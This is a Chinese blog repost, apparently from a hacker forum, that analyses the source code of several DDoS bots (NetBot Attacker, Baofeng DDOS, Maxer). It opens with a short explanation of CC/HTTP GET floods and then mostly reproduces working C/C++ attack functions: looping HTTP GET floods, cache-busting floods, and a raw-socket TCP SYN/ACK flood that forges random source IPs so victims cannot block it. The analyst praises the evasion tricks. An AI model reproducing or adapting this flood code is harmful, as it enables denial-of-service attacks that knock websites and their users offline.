- WinCE Security...
- xdebug配置说明
- VC++ 获取文件的创建、修...
- ASP进度条
- 简单代理服务器C代码实现(S...
- 程序设计竞赛试题选(02)
- 如何在ASP程序中打印Acc...
- UTF-8和16进制区间
- ASP实用技巧:强制刷新和判...
- 运行中程序删除自己的方法
- asp提高首页性能的一个技巧
- [J2EE]J2EE 应用服务器技术
- VB变量命名规范
- C语言常见错误小结
- (摘自网络)如何在IIS中调...
CC与D-DOS解析
//=================================================================================
分析者:alalmn—飞龙 BLOG:http://hi.baidu.com/alalmn
分析的不好请各位高手见谅花了几个小时分析的呵呵
在这里不得不说 很多代码只写了界面 服务端没代码(把代码删除了) 要发就全部发了 重点自己藏着
这就是中国程序员的通病 一时半会没办法克服
实际中的HTTPGET攻击就是CC
CC(http get flood)的定义可以用下面几句话进行描述:
1.利用代理服务器向受害者发起大量HTTP Get请求
2.主要请求动态页面,涉及到数据库访问操作
3.数据库负载以及数据库连接池负载极高,无法响应正常请求,导致系统不可用。
//=================================================================================
NetBot_Attacker.h
/*
unsigned long CALLBACK nocache_get(LPVOID dParam) //HTTP 空GET请求 不缓存,每回重新请求页面!
unsigned long CALLBACK null_get(LPVOID dParam) //缓存 Get Flood 空GET链接
客户机 HTTP 空GET请求=nocache_get NoCache Get Flood(缓存 Get Flood)=null_get
但是我不这样认为 从他函数的意思 来看正好相反(估计是NB在发布代码的时候做手脚的 NB老爱玩小动作)
真正的意思是 HTTP 空GET请求=null_get NoCache Get Flood(缓存 Get Flood)=nocache_get
doHTTP 这个地方其实我觉得没必要这么麻烦
可以这样 send(m_hSocket,szBuffer,sizeof(szBuffer) 直接发送就好了(不知道效果一样不呵呵)
*/
bool doHTTP(char* ServerName,DWORD port,char* ActionFile, char* Method,char* HttpHeaders, char* FormData)
{ //doHTTP("127.0.0.1",8080,"*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html","GET","Cache-Control: no-cache\r\nReferer: http://www.baidu.com\r\n","");
HMODULE hDll;
LPVOID hSession,hConnect,hRequest;
bool bSendRequest=false;
char buf[1000];
DWORD dwFlags;
hDll = LoadLibrary("wininet.dll");
if(hDll)
{
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetConnect ) ( LPVOID ,LPCTSTR ,WORD ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef LPVOID ( WINAPI * pHttpOpenRequest ) ( LPVOID ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCSTR FAR * ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pHttpSendRequest ) (LPVOID ,LPCSTR ,DWORD ,LPVOID,DWORD) ;
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
pInternetOpen InternetOpen=NULL;
pInternetConnect InternetConnect=NULL;
pHttpOpenRequest HttpOpenRequest=NULL;
pHttpSendRequest HttpSendRequest=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetConnect = (pInternetConnect ) GetProcAddress ( hDll, "InternetConnectA");
HttpOpenRequest = (pHttpOpenRequest) GetProcAddress (hDll,"HttpOpenRequestA");
HttpSendRequest = ( pHttpSendRequest ) GetProcAddress( hDll, "HttpSendRequestA" );
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
// 创建Internet
hSession = InternetOpen("Hackeroo",0, NULL, NULL, 0);
if (hSession != NULL)
{
// 连接服务器
hConnect = InternetConnect(hSession,ServerName,(WORD)port, NULL, NULL, 3, 0, 1);
if (hConnect!= NULL)
{
// 创建一个请求
LPTSTR AcceptTypes[2]={"*/*",NULL};
hRequest = HttpOpenRequest(hConnect,Method,ActionFile,"HTTP/1.1",NULL,(LPCTSTR*)AcceptTypes,0, 1);
if (hRequest!= NULL)
{
// 发送请求
bSendRequest =HttpSendRequest(hRequest,HttpHeaders,strlen(HttpHeaders),FormData,strlen(FormData));
if (bSendRequest)
{
memset(buf,0,1000);
InternetReadFile(hRequest, buf,999, &dwFlags);
printf("%s",buf);
}
}
}
// 清除句柄
if (hRequest)
InternetCloseHandle(hRequest);
if (hConnect)
InternetCloseHandle(hConnect);
if (hSession)
InternetCloseHandle(hSession);
}
FreeLibrary(hDll);
}
return bSendRequest;
}
/***************************************************/
unsigned long CALLBACK nocache_get(LPVOID dParam) //HTTP 空GET请求 不缓存,每回重新请求页面!
{
char all[100],ip[32],port[6],url[32],*point=NULL;
int httpport=80;
strcpy(all,fuckweb.FuckIP); //复制内存 //攻击网址
point=all;
/*
//其实我觉得这段根本没用 这些我觉得都应该在客户端里处理好了在发过来
if(strstr(all,"http://")!=NULL) //strstr查找字符串
{//没有
point=point+strlen("http://");//把http://添加进point
}
if(strstr(point,":")!=NULL)//strstr查找字符串
{
memset(ip,0,sizeof(ip)); //内存空间初始化
strncpy(ip,point,strcspn(point,":")); //复制内存
//strcspn查找字符出现的位置
point=point+strcspn(point,":")+1; //把:添加进point
if(strstr(point,"/")!=NULL) //strstr查找字符串
{
memset(port,0,sizeof(port));
strncpy(port,point,strcspn(point,"/"));
httpport=atoi(port);
point=point+strcspn(point,"/");
memset(url,0,sizeof(url));
strcpy(url,point); //复制内存
}
}
else
{
if(strstr(point,"/")!=NULL)
{
memset(ip,0,sizeof(ip));
strncpy(ip,point,strcspn(point,"/"));
point=point+strcspn(point,"/");
memset(url,0,sizeof(url));
strcpy(url,point);
}
}
*/
while(!stopfuck)
{
doHTTP(ip,
httpport,
"/*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html",
"GET",
"Cache-Control: no-cache\r\nReferer: http://www.baidu.com\r\n",
""); //创建连接 发送请求
Sleep(40);
}
return 0;
}
unsigned long CALLBACK null_get(LPVOID dParam) //缓存 Get Flood 空GET链接
{
char all[100],ip[32],port[6],url[32],*point=NULL;
int httpport=80;
strcpy(all,fuckweb.FuckIP);
point=all;
if(strstr(all,"http://")!=NULL)
{
point=point+strlen("http://");
}
if(strstr(point,":")!=NULL)
{
memset(ip,0,sizeof(ip));
strncpy(ip,point,strcspn(point,":"));
point=point+strcspn(point,":")+1;
if(strstr(point,"/")!=NULL)
{
memset(port,0,sizeof(port));
strncpy(port,point,strcspn(point,"/"));
httpport=atoi(port);
point=point+strcspn(point,"/");
memset(url,0,sizeof(url));
strcpy(url,point);
}
}
else //这些都一样
{
if(strstr(point,"/")!=NULL)
{
memset(ip,0,sizeof(ip));
strncpy(ip,point,strcspn(point,"/"));
point=point+strcspn(point,"/");
memset(url,0,sizeof(url));
strcpy(url,point);
}
}
while(!stopfuck)
{
doHTTP(ip,
httpport,
"",
"GET",
"Cache-Control: no-cache\r\nReferer: http://www.google.com\r\n",
"");
Sleep(40);
}
return 0;
}
//=================================================================================
暴风DDOS.h
void moni_flood() //IE缓存
{
CString url11,http,rhost;
http = zIP;
rhost = http;
char *jj = "/";
url11="GET "+rsCS(jj)+" HTTP/1.1\r\n" //要访问的页面(/list.asp?id=***)
+"Referer: http://"+rhost+":80/http://"+rhost
+"\r\nHost: "+rhost //访问来源地址
+"\r\nConnection: Close" //
+"\r\nCache-Control: no-cache"
+"\r\n\r\n";
while (1)
{
if (StopFlag == 1) //是否在攻击状态
{
ExitThread(0);
return;
}
SOCKET S=tcpConnect(tgtIP,tgtPort); //创建一个套接字连接到已经存在的服务器
send(S,url11,url11.GetLength() ,0); //发送消息
closesocket(S); //关闭socket
Sleep(SleepTime); //延时
}
}
//=================================================================================
Maxer.h
DWORD WINAPI HTTP(LPVOID dParam) //HTTP缓存攻击
{
srand((unsigned)time( NULL ));
PDDOSINFO pddosinfo = (PDDOSINFO)dParam; //攻击结构体
DDOSINFO ddosinfo; //攻击结构体
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));//复制内存
WSADATA WSAData;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2) ,&WSAData);//确定SOCKET版本
SOCKET sendSocket;
SOCKADDR_IN Sin; //IP信息结构
IP_HEADER ipHeader;
TCP_HEADER tcpHeader;
PSD_HEADER psdHeader;
char szSendBuf[128]={0};
if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) //创建一个与指定传送服务提供者捆绑的套接口
{
printf("Socket Setup Error...\n");
return 0;
}
BOOL flag=1;
if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
{
printf("Setsockopt IP_HDRINCL Error...\n");
return 0;
}
int timeout = 3000;
if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时 //SOCKET_ERROR创建错误
{
printf("Setsockopt SO_SNDTIMEO Error...\n");
return 0;
}
Sin.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
Sin.sin_port=htons(ddosinfo.port); //将网络地址转换成IP地址
Sin.sin_addr.S_un.S_addr=resolve(ddosinfo.addr); //存储端口号(使用网络字节顺序)
char src_ip[20] = {0};
while(1)
{
if(IsStop==1)//是否在攻击状态
{
ExitThread(0);
return 0;
}
if (rand()%2==0) //随机数
strcpy(szSendBuf,"GET / HTTP GET / HTTP GET / HTTP GET / HTTP GET / HTTP"); //GET 数据
else
strcpy(szSendBuf,"POST / HTTP POST / HTTP POST / HTTP POST / HTTP POST / HTTP"); //POST 数据
for(int a=0;a<24;a++)
{
wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); //格式化字符串 伪造IP
//这样写比较好每次产生的IP都不同 就可以更好让人家对我们攻击难以屏蔽
//填充IP首部
ipHeader.h_verlen = (4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
ipHeader.tos = 0;
ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader)); //16位总长度(字节)
ipHeader.ident = 1; //16位标识
ipHeader.frag_and_flags = 0x40; //3位标志位
ipHeader.ttl = 128; //8位生存时间TTL
ipHeader.proto = IPPROTO_TCP; //8位协议(TCP,UDP…)
ipHeader.checksum = 0; //16位IP首部校验和
ipHeader.sourceIP = inet_addr(src_ip); //伪IP 伪装自己的IP
ipHeader.destIP = Sin.sin_addr.s_addr; //目标地址
//填充TCP首部
tcpHeader.th_sport = htons(rand()%1025); //源端口号 目标端口 随机产生呵呵很好很高很绝
tcpHeader.th_dport = htons( ddosinfo.port ); //目标端口
tcpHeader.th_seq = htonl( rand()%900000000 + 1 ); //SYN序列号
tcpHeader.th_ack=rand()%3; //ACK序列号置为0
if (rand()%2 == 0) tcpHeader.th_flag=0x02; //SYN 标志 //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
else tcpHeader.th_flag=0x10; //SYN 标志 //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
tcpHeader.th_lenres = (sizeof(tcpHeader)/4<<4|0); //TCP长度和保留位
tcpHeader.th_win = htons(512); //窗口大小
tcpHeader.th_sum = 0; //校验
tcpHeader.th_urp = 0; //紧急数据偏移量
//填充TCP伪首部(用于计算校验和,并不真正发送)
psdHeader.saddr = ipHeader.sourceIP; //伪IP 伪装自己的IP
psdHeader.daddr = ipHeader.destIP; //目标地址
psdHeader.mbz = 0;
psdHeader.ptcl = IPPROTO_TCP; //协议类型
psdHeader.tcpl = htons(sizeof(tcpHeader)); //TCP长度
//计算TCP校验和
memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) );
memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) );
tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );
//计算IP检验和
memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );
sendto(sendSocket, szSendBuf,sizeof(szSendBuf) + sizeof(ipHeader), 0, (struct sockaddr*)&Sin, sizeof(Sin)); //发送TCP报文
}
Sleep(40);
}
return 0;
}
//IE攻击攻击
DWORD WINAPI IE(LPVOID dParam)
{
PDDOSINFO pddosinfo = (PDDOSINFO)dParam;
DDOSINFO ddosinfo;
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[1000],*retstr=NULL;
retstr=buf;
DWORD dwFlags;
hDll = LoadLibrary("wininet.dll");
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
while (1)
{
if (IsStop == 1)
{
FreeLibrary(hDll);
ExitThread(0);
return 0;
}
// 创建Internet
hInternet = InternetOpen("CreateIE",0, NULL, NULL, 0); //获取句柄 初始化应用程序
if (hInternet != NULL)
{
hUrlHandle = InternetOpenUrl(hInternet, ddosinfo.addr, NULL, 0, 0x04000000, 0); //打开链接网站
if (hUrlHandle!= NULL)
{
memset(buf,0,1000);
InternetReadFile(hUrlHandle, buf,999, &dwFlags); //读取数据
InternetCloseHandle(hUrlHandle);
hUrlHandle = NULL;
}
InternetCloseHandle(hInternet);
hInternet = NULL;
}
Sleep(50000);
}
}
摘自红色黑客联盟(www.7747.net) 原文:http://www.7747.net/Article/200910/41882.html